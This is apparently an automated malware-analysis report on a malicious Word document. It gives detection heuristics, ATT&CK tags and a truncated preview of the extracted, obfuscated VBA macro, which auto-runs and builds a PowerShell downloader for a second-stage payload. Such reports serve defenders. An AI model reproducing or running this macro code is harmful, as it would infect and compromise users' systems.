MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The 'OLE_VBA_SHELL' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristics indicate that the macros use the Shell() function to execute arbitrary code. The ClamAV detection 'Doc.Macro.Obfuscation-6389653-0' further confirms its malicious nature. The primary function of the VBA script appears to be downloading and executing a second-stage payload.
Heuristics 7
-
ClamAV: Doc.Macro.Obfuscation-6389653-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.Obfuscation-6389653-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 136863 bytes |
SHA-256: b7dafe0cf3a6146921cc82e946398dd784ba799846375b559c4ebd1f4dcfdfb7 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "zKETIifthc"
Function BajsCjKRDYzJH()
OrDbQpvJDf = Array(LTrim(LTrim("TAvQIrfZmZsmh" + "WrEHTUtr")), LTrim(LTrim("bajjnhwYjtV" + "JNbiNblvA")), LTrim(LTrim("WRNzdqjPf" + "cWUpbIsrnBMsMq")), LTrim(LTrim("ddZGsIwd" + "EPWpEIsR")), LTrim(LTrim("bqntlGEjt" + "zFdFWkzM")), LTrim(LTrim("JmlfsLlM" + "CniJuilAZksS")), LTrim(LTrim("JOoiDaJ" + "FEwlHcpKvizuSh")), LTrim(LTrim("dqLzUWL" + "UnIdXrNIK")))
TUFjHs = Mid("lmpWcjBlIc[5]+Ss4xSs4)').rEPLaCe(([cHar]71+[cHar]50+[cHar]83),'|').rEPLaCe(([cJuPcN78w5wZI", 7, 72)
csTwbvDz = Array(LTrim(LTrim("zculLmD" + "hzqUVodTFTA")), LTrim(LTrim("XSJGNARHj" + "PJTfNhdQp")), LTrim(LTrim("qiiuApftzK" + "QkwjhTnYKVw")), LTrim(LTrim("QjhApbwpodcWpn" + "FYVXJWkwY")), LTrim(LTrim("zfOpsfDulN" + "TopSBUrm")), LTrim(LTrim("bqtEhAoz" + "bjlIfqvhzwwZb")), LTrim(LTrim("ZDmjjFH" + "tMPtImK")), LTrim(LTrim("rqFHKhZL" + "zWUUunjz")))
wNWlPQIa = Array(LTrim(LTrim("mzihXmB" + "pdCsYibIKosbpd")), LTrim(LTrim("pczzzSSiaprfkX" + "SYzYjhNcPZBOhZ")), LTrim(LTrim("jNJDtFanC" + "WvbChCrlOVT")), LTrim(LTrim("QzMcAiazDlI" + "GiWhipsk")), LTrim(LTrim("vJmlZiWKdTDwFw" + "rQFrNEZl")), LTrim(LTrim("RwDfKHYcjiVn" + "raADnZSENA")), LTrim(LTrim("KpNkAXqVYzTc" + "rAWubNWaYRZ")), LTrim(LTrim("rKRzTiDvVUU" + "obLsAPaXwVLnDX")))
PcOzfVOBAI = Array(LTrim(LTrim("wsmmVbQFo" + "wNFjjZwsAmAU")), LTrim(LTrim("YOjAimmOudR" + "jQKNmat")), LTrim(LTrim("NdaldVuSNGnNcP" + "YlbiTBXCk")), LTrim(LTrim("jzJniNLHaOvnz" + "MrUBnqEXTC")), LTrim(LTrim("cLsasqaqwzYl" + "isbFCBSkoDV")), LTrim(LTrim("hVPuiIiGACC" + "hhYUzzanG")), LTrim(LTrim("TuOwVRjBoHWzK" + "LwPpuiifqI")), LTrim(LTrim("UdwnodiUtC" + "fkmMXzOuwh")))
WNlqAfna = Mid("348U6+[CHAR]115),[CHAR]39) G'+'2S&( zqAEnV:PUBLiC[13]+zqAEnV:PUlrBqV27Hb6Pv4ld", 5, 59)
slTkb = Array(LTrim(LTrim("AiHmYnFJNYV" + "RQjJWfc")), LTrim(LTrim("zBiaJqC" + "WwdwwECROiv")), LTrim(LTrim("iSwTfLJ" + "RMpHbRiz")), LTrim(LTrim("jchlZmPvZHMNOu" + "kWXjDKuwhuOKI")), LTrim(LTrim("UfaDShFOUJ" + "iYGDwuCRCXE")), LTrim(LTrim("zvplizrKcGZEcm" + "wNhVCNAU")), LTrim(LTrim("ovlALtGwQlcH" + "vbOczDczCaJ")), LTrim(LTrim("GEUBCjwbDziO" + "wjzaorJCTRFHZ")))
nZBqz = Array(LTrim(LTrim("DIBkktcKoD" + "aBokOzi")), LTrim(LTrim("iRSqQfCiGfQvM" + "zZqmEspsjORaJ")), LTrim(LTrim("XnlPQHDFlSkF" + "KViXHsjDPubv")), LTrim(LTrim("wmiDZqVRKTuB" + "FnsnXCzKiWE")), LTrim(LTrim("JhajIsJUfIQWh" + "tjQABkWcnwLbW")), LTrim(LTrim("waUPdNQJuk" + "bkhAwWV")), LTrim(LTrim("fIPudUU" + "jtiVhWjYEo")), LTrim(LTrim("sUckofz" + "zpcrZqVrRjj")))
CUuRjdw = Array(LTrim(LTrim("ridbajRlsfN" + "OJGoMmdjF")), LTrim(LTrim("wuWuOir" + "jNfPLNtBwthwEA")), LTrim(LTrim("qaZdTbfW" + "WmkjEfVmu")), LTrim(LTrim("zzhwwtvKnjBJzw" + "jUpAXTBrNtYd")), LTrim(LTrim("zSXuCGAN" + "cakYQrmQ")), LTrim(LTrim("nlBXLjmW" + "zHUEaPlNUMH")), LTrim(LTrim("szUYsOPz" + "KEzjksI")), LTrim(LTrim("HqIfbDFoXA" + "mDWaIGunjz")))
DRSdPuFY = Mid("5N735VzXjO6RQ8E1hbk5msYun6Sw1saVpbc.ToStriNVs+NVsng(NVs+NVs),'+' NVs+NVsRSV'+'huas);NVs+N'+'VsInvoke-Item(RNVs+NVsSVhuNVs+NVsas);break;}catSs4+Ss4ch{NVs+NVswriteNVs+NVs-host R'+'SVNVs+NVs_.Ex'+'ceptiNVs+NVson.MesNVs+NVsSs4+Ss4dHb", 34, 193)
QrGczsdQEFj = Array(LTrim(LTrim("uJtjPQPUEAJwH" + "clCXaOiuUi")), LTrim(LTrim("CFiLiSr" + "zGiatVYPiV")), LTrim(LTrim("jjjDNjouGSLApP" + "NLkIaiRYKPt")), LTrim(LTrim("JCBwAYWw" + "SBRbqYlEmF")), LTrim(LTrim("LNHNiWvQOHZoTZ" + "rETLbTQHvJT")), LTrim(LTrim("jJjTXJAwvuo" + "ddFjPsNzCK")), LTrim(LTrim("hlaiauGMDLqL" + "ioBiTak")), LTrim(LTrim("PzhwNhrCwWdZdz" + "zfZDpikInRzB")))
pCRtIbluW = Array(LTrim(LTrim("SWXcnDWXp" + "dnNVwaRuPk")), LTrim(LTrim("OuMwnioaqE" + "ZoYmIwQCRzL")), LTrim(LTrim("JPIEJfdtRPwEbK" + "zYhzwSBOZwM")), LTrim(LTrim("SiNSUCvDi" + "aiuMKJKpUKz")), LTrim(LTrim("QdjCMfIBjI" + "MLPEwiBjHvUwDC")), LTrim(LTrim("HrDkbCVzNjiS" + "PuhvShiBvFNLT")), LTrim(LTrim("pZwfjAaYQwz" + "urNCVOLLQMN")), LT
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.